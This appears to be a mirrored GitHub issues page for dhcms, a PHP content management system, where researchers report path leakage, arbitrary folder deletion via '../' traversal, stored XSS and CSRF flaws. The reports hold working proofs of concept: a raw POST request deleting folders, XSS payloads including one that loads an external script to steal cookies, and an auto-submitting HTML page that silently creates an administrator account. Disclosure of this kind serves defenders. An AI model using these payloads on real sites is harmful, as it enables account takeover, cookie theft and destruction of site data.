shaogongbra / dhcms Goto Github PK

View Code? Open in Web Editor NEW

0.0 0.0 0.0 1.76 MB

鼎华云CMS，快速搭建企业网站

PHP 41.64% HTML 14.49% ApacheConf 0.03% CSS 10.38% JavaScript 33.11% XSLT 0.35%

dhcms's People

Contributors

Watchers

dhcms's Issues

dhcms Physical path leak

Vulnerability details：

Enter invalid content after the normal file, causing an error。

url:http://192.168.3.56/dhcms/index.php?r=DhCms/Form/index&name=guestbook

Any file is fine, just enter invalid characters at the back。

There is an arbitrary folder deletion vulnerability here:/admin.php?r=admin/AdminBackup/del

Vulnerability file: \framework\ext\Util.php
You can see that the following code does not filter ../ or ..\, it just filters . or .., which will cause any folder to be deleted

Vulnerability to reproduce:
1、Log in to the backend first
2、Construct the packet as follows:
.............................................
POST /admin.php?r=admin/AdminBackup/del HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.xxx.com/admin.php?r=admin/AdminBackup/index
Content-Length: 20
Cookie: PHPSESSID=prukpjkatj61ivpcp5lh976ok4
DNT: 1
Connection: close

data=../111
............................................
You can see that the page shows that the file was deleted successfully

Repair suggestion:
filter ../ or ..\

Dhcms Stored-XSS Vulnerabilities_in guestbook

Holes for details:
in guestbook

`http://192.168.3.56/dhcms/api.php?r=dhcms/Form/push

POST:
content=1'"()%26%25<ScRiPt%20>alert(5555)</ScRiPt>&email=sample%40email.tst&keyword=e&model=1&name=e&table=guestbook&token=+7c817f9ed88f10ea0b0070efe974c29c+`

you can Executed alert。

http://192.168.3.56/dhcms/index.php?r=DhCms/Form/index&name=guestbook

Dhcms Stored-XSS Vulnerabilities(Administrator Privilege)

Holes for details:
1、Login the backstage:
http://localhost/dhcms/admin.php?r=admin/Index/index
2、The form

input："><script>alert(document.cookie)<script>

and input:"><script src=//xsspt.com/VZiWzL></script>
you can accept cookie information

There is a CSRF vulnerability that can add the administrator account

After the administrator logged in, open the following page
poc：

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='group_id' value='1' />";
fields += "<input type='hidden' name='username' value='root' />";  
fields += "<input type='hidden' name='nicename' value='hack' />";  
fields += "<input type='hidden' name='email' value='[email protected]' />";  
fields += "<input type='hidden' name='password' value='hack123' />";
fields += "<input type='hidden' name='password2' value='hack123' />";  
fields += "<input type='hidden' name='status' value='1' />";  
fields += "<input type='hidden' name='user_id value='' />";  

var url = "http://127.0.0.1/dhcms/admin.php?r=admin/AdminUser/add&submit=提交";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

shaogongbra / dhcms Goto Github PK

dhcms's People

Contributors

Watchers

dhcms's Issues

dhcms Physical path leak

There is an arbitrary folder deletion vulnerability here:/admin.php?r=admin/AdminBackup/del

Dhcms Stored-XSS Vulnerabilities_in guestbook

Dhcms Stored-XSS Vulnerabilities(Administrator Privilege)

There is a CSRF vulnerability that can add the administrator account

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent